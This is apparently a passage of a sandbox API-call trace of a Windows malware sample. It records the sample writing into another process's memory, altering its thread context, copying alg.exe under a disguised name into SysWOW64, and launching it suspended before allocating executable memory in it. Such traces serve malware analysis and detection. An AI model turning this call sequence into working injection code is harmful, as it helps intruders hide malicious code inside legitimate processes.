[17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7ffde000, Edx=0x0, Ecx=0x0, Eax=0x401000, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0249.927] IsWow64Process (in: hProcess=0x3b4, Wow64Process=0x195fae0 | out: Wow64Process=0x195fae0) returned 1 [0249.927] WriteProcessMemory (in: hProcess=0x3b4, lpBaseAddress=0x400000, lpBuffer=0x14d0000*, nSize=0x1c000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x14d0000*, lpNumberOfBytesWritten=0x0) returned 1 [0249.932] WriteProcessMemory (in: hProcess=0x3b4, lpBaseAddress=0x7ffde008, lpBuffer=0x195fae4*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x195fae4*, lpNumberOfBytesWritten=0x0) returned 1 [0249.933] WriteProcessMemory (in: hProcess=0x3b4, lpBaseAddress=0x7ffdf010, lpBuffer=0x195fae4*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x195fae4*, lpNumberOfBytesWritten=0x0) returned 1 [0249.933] SetThreadContext (hThread=0x3b0, lpContext=0x195f7f4*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7ffde000, Edx=0x0, Ecx=0x0, Eax=0x4063f6, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0249.936] ResumeThread (hThread=0x3b0) returned 0x1 [0249.936] WaitForSingleObject (hHandle=0x3b4, dwMilliseconds=0x493e0) returned 0x0 [0251.713] TerminateProcess (hProcess=0x3b4, uExitCode=0x0) returned 0 [0251.713] CloseHandle (hObject=0x3b4) returned 1 [0251.713] CloseHandle (hObject=0x3b0) returned 1 [0251.713] CloseHandle (hObject=0x0) returned 0 [0251.713] VirtualFree (lpAddress=0x14d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0251.714] GetCurrentProcess () returned 0xffffffff [0251.714] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x195ff44 | out: Wow64Process=0x195ff44) returned 1 [0251.715] VirtualAlloc (lpAddress=0x0, dwSize=0x22000, flAllocationType=0x3000, flProtect=0x4) returned 0x20a0000 [0251.717] WTSGetActiveConsoleSessionId () returned 0x1 [0251.717] QueryUserToken () returned 0x0 [0251.717] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x195fb00 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0251.718] lstrcatW (in: lpString1="C:\\Windows\\system32", lpString2="\\alg.exe" | out: lpString1="C:\\Windows\\system32\\alg.exe") returned="C:\\Windows\\system32\\alg.exe" [0251.718] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x195fd08, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\indexerneutral.exe" (normalized: "c:\\windows\\syswow64\\indexerneutral.exe")) returned 0x26 [0251.718] lstrlenW (lpString="C:\\Windows\\SysWOW64\\indexerneutral.exe") returned 38 [0251.718] lstrcpyW (in: lpString1=0x195fd4c, lpString2="b.exe" | out: lpString1="b.exe") returned="b.exe" [0251.718] Wow64DisableWow64FsRedirection (in: OldValue=0x195ff10 | out: OldValue=0x195ff10*=0x0) returned 1 [0251.718] CopyFileW (lpExistingFileName="C:\\Windows\\system32\\alg.exe" (normalized: "c:\\windows\\system32\\alg.exe"), lpNewFileName="C:\\Windows\\SysWOW64\\indexerneutralb.exe" (normalized: "c:\\windows\\syswow64\\indexerneutralb.exe"), bFailIfExists=0) returned 1 [0252.071] _snwprintf (in: _Dest=0x195f8f8, _Count=0x104, _Format="\"%s\" \"%s\"" | out: _Dest="\"C:\\Windows\\SysWOW64\\indexerneutralb.exe\" \"C:\\Windows\\TEMP\\3267.tmp\"") returned 68 [0252.071] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\SysWOW64\\indexerneutralb.exe\" \"C:\\Windows\\TEMP\\3267.tmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x404, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x195f88c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x195ff14 | out: lpCommandLine="\"C:\\Windows\\SysWOW64\\indexerneutralb.exe\" \"C:\\Windows\\TEMP\\3267.tmp\"", lpProcessInformation=0x195ff14*(hProcess=0x3f0, hThread=0x410, dwProcessId=0x538, dwThreadId=0x498)) returned 1 [0252.095] NtQueryVirtualMemory (in: ProcessHandle=0x3f0, Address=0x140000000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x195f850, Length=0x30, ResultLength=0x0 | out: VirtualMemoryInformation=0x195f850*(BaseAddress=0x40000000, AllocationBase=0x1, AllocationProtect=0x0, RegionSize=0x0, State=0x0, Protect=0x0, Type=0x4af70000), ResultLength=0x0) returned 0x0 [0252.095] NtAllocateVirtualMemory (in: ProcessHandle=0x3f0, BaseAddress=0x195f8b8*=0x140000000, ZeroBits=0x0, RegionSize=0x195f8c0*=0x22000, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x195f8b8*=0x140000000, RegionSize=0x195f8c0*=0x22000) returned 0x0 [0252.096] NtGetContextThread (in: ThreadHandle=0x410, Context=0x195f380 | out: Context=0x195f380*(ContextFlags=0x0, Dr0=0x195f7d8, Dr1=0x2000, Dr2=0x0, Dr3=0x7754c72c, Dr6=0x0, Dr7=0x195f83c, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x8b050000, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x100002, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x2, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x27, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x20, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x1, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0xec, [33]=0xf3, [34]=0x95, [35]=0x1, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x70, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0xac, [45]=0xf8, [46]=0x95, [47]=0x1, [48]=0xa1, [49]=0xf8, [50]=0x95, [51]=0x1, [52]=0x3, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x48, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x6, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x90, [73]=0xd6, [74]=0x2d, [75]=0xdb, [76]=0xf6, [77]=0x7f, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0xda985000, SegGs=0x7ff6, SegFs=0x0, SegEs=0x0, SegDs=0xda985000, Edi=0x7ff6, Esi=0x0, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x80, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x68, [69]=0x12, [70]=0x0, [71]=0x0, [72]=0x1, [73]=0x60, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x1, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x4f, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x14, [145]=0xff, [146]=0x95, [147]=0x1, [148]=0xf0, [149]=0x7d, [150]=0x5d, [151]=0x0, [152]=0x20, [153]=0xf6, [154]=0x95, [155]=0x1, [156]=0x0, [157]=0x70, [158]=0x50, [159]=0x7f, [160]=0x0, [161]=0xe0, [162]=0xfd, [163]=0x7f, [164]=0x4e, [165]=0x0, [166]=0x50, [167]=0x0, [168]=0x78, [169]=0x3, [170]=0x52, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x9c, [177]=0x4, [178]=0x0, 